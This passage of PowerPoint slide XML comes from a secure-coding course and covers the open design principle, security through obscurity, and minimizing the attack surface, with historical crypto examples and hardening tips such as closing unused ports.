              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756058" lvl="1" indent="-287569" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="1080"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756058" algn="l"/>
                <a:tab pos="756693" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Default</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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accounts</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756058" lvl="1" indent="-287569" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="1085"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756058" algn="l"/>
                <a:tab pos="756693" algn="l"/>
              </a:tabLst>
            </a:pP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Deployment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-4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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>procedures</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756058" lvl="1" indent="-287569" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="1080"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756058" algn="l"/>
                <a:tab pos="756693" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Backup</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>procedures</a:t>
            </a:r>
            <a:endParaRPr sz="1999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65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639013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0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5" dirty="0"/>
              <a:t>Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>- Example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32267"/>
            <a:ext cx="10147197" cy="2560923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5078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Several</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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major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security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systems</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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were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made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public in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advance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of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release</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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insure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they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were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technically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sound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1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RSA’s RC4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algorithm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was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made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public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ahead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time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PG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 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elease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sou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GSM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proprietary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A5/1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strong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crypto-suite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was</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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kept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secret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(1989)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ame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kn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gh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 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ac</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-40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mpletely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inee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1994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4927391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5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5" dirty="0"/>
              <a:t>Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>– In </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Obscurity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267122"/>
            <a:ext cx="10164972" cy="3817260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depend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obscurity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protection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But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using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obscurity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camouflage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fine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kno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king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Changing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 name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Admin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user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Changing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-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bin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demos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Cha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ging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 name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syste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admi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ist</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-4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ati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x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ut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bl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But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making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more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difficult,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never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wrong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thing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do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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPct val="90100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="79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 Cullinan Diamond (3106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carets) was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mailed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from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South Africa to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London by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regular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post, and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then carried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to Amsterdam in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 pocket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 a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diamond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cutter(1905)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2327" y="1327950"/>
            <a:ext cx="2925317" cy="218941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78549" y="6318690"/>
            <a:ext cx="5747158" cy="130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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1045"/>
              </a:lnSpc>
            </a:pP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Image</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="6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courtesty</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="8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of:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://ngm.nationalgeographic.com/wallpaper/img/2010/08/aug10wallpaper-11_1600.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="10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66</a:t>
            </a:fld>
            <a:endParaRPr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078549" y="6318690"/>
            <a:ext cx="5747158" cy="130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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1045"/>
              </a:lnSpc>
            </a:pP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Image</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="6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courtesty</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="8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of:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://ngm.nationalgeographic.com/wallpaper/img/2010/08/aug10wallpaper-11_1600.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="10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67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4927391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5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5" dirty="0"/>
              <a:t>Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>– In </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Obscurity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267122"/>
            <a:ext cx="9764392" cy="3711243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similar strategy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called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lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
            </a:pP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Through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Minority/Rarity/Obsolesence/Unpopularity/Lack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2696" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc>
            </a:pP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Interest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318040" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="42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methods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used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seldom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out-of-date,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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depending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general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lack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knowledge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interest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defense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0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limited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products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attract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any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interest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from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potential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attackers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Examples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Using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out-of-date</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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vulnerable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PHP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version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Using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version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SSL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vulnerable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 the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Heartbleed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attack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3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Using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Microsoft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CryptGenRandom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based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random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number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generator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148305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5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35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5" dirty="0"/>
              <a:t>Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>–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10" dirty="0"/>
              <a:t>Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>Pattern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267123"/>
            <a:ext cx="9831049" cy="4087700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Alias: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None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Pressures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release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deadlines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may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encourage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insecure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solutions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Fear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of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publically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releasing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algorithms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code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 p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ot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inte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ual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"I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don't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secure,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just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 more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 other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guy"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mentality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279316" indent="-266620" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="278681" algn="l"/>
                <a:tab pos="279316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Consequences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mo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stin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scr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ti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elo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n't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scuri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less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trepidation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over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possible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release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informat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79564" y="5007063"/>
            <a:ext cx="370743" cy="3370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126">
              <a:lnSpc>
                <a:spcPts val="2634"/>
              </a:lnSpc>
            </a:pP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ion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82198" y="4102087"/>
            <a:ext cx="2555082" cy="19066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218205" y="6352896"/>
            <a:ext cx="4612708" cy="166028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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Image</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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courtesy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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of:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.gjsentinel.com/blogs/images/far-side%25202bears(1).jpg</a:t>
            </a:r>
            <a:endParaRPr sz="10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68</a:t>
            </a:fld>
            <a:endParaRPr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69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639013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0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5" dirty="0"/>
              <a:t>Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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10308445" cy="3964542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Design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3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features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as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though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only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keys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private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point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open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design is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secrets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usually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not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secret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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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software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has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proprietary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algorithms,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processes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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procedures,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assume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they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public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when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design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9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Without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proprietary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algorithms,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need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especially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careful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keys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Areas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where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data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 commonly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assumed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safe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when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 not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egistr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eys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Har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d-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pass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encryp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ion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eys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HTM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ythin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sto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cli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nt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host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Anything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sent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over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unencrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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communication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channel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666"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0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5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70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639013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0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5" dirty="0"/>
              <a:t>Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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32267"/>
            <a:ext cx="10025943" cy="3892806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611322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Obscure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or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customized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security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algorithms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seldom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reliable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which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increases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risk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30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Encryption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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Randomization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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-8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management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lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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Any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mechanism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depends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no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one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noticing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doomed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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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failure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Keys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are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safe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only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make them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nside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rus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nd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ries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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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features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designed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protect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them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even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everyone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knows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how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they </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-67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work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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2639427"/>
            <a:ext cx="3470641" cy="2737472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="35551" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Design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6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Establish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Boundaries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6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Don't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Reinvent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Wheel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7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Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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Mechanism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55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199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Reluctance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55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Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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Design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7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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Minimize</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-1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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-2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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> Surface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55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Weakest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Link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72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4506513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5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5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="35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5" dirty="0"/>
              <a:t>Minimize</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Surface</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10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267122"/>
            <a:ext cx="9698369" cy="4114998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Principle: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smaller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attack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surface,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safer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 application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risk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application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Size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of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Attack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Surface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x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Probability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Vulnerability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probability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vulnerability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going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zero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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="83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Attack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surface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reduction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(ASR)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requires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acceptance</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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idea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that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code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never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completely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0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Desig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i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mplementati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ailu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nfigu</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5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atio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10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ailu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 insta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at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up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99" spc="-4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ad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Ne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yp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Mista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73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Common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Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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Minimize</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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Attack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Surface</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267122"/>
            <a:ext cx="9675515" cy="4033103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Alias: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None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Attack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surfaces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tend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grow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unless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deliberately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reduced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considerable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pressure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add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new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entry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points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form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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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35" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>New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features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API's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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Greater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connectivity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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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Reducing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 attack surface existing code may require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significant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resource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committment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47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Consequences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Decreased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attack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surface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size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decreases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opportunity</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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attackers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Decreased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attack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surface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size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simplifies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overall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problem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74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639013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0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5" dirty="0"/>
              <a:t>Minimize</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Surface</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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9436182" cy="3739023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Attack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Surface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Reduction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focuses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4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 amo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run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ing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c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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="5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50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default,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only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necessary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code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running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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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30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greatly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enhanced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modularizing and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isolating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software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components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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Consider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 distributed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architecture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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Limit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code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when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universally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required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Minimi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z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 open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s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ervic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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Only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allow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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services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run that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necessary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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Close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all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 unnecessary</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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ports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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Obscure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often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unused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protocols are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often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vulnerable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1213121" lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="190"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1213756" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-40" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>finger,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>whois,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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99" spc="-45" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Webster,</a:t>
            </a:r>
            <a:endParaRPr sz="17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75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639013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0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5" dirty="0"/>
              <a:t>Minimize</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Surface</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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1259766" y="1312943"/>
            <a:ext cx="9934527" cy="3620946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="34281" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="27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ed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paths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ymou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users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279"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Anonymous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code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paths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far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larger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attack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vector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sets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because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anyone</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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279"/>
              </a:lnSpc>
            </a:pP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199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paths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60"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="5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50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anonymous</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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paths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allowed,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 they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restricted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short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1050610" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2159"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Anonymous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paths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operate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same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code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restricted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paths,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so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1999" spc="-6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opportunity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privilege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escalation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significant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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="10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4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 num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ints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50"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Entry</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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points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code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locations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 where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untrusted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components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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
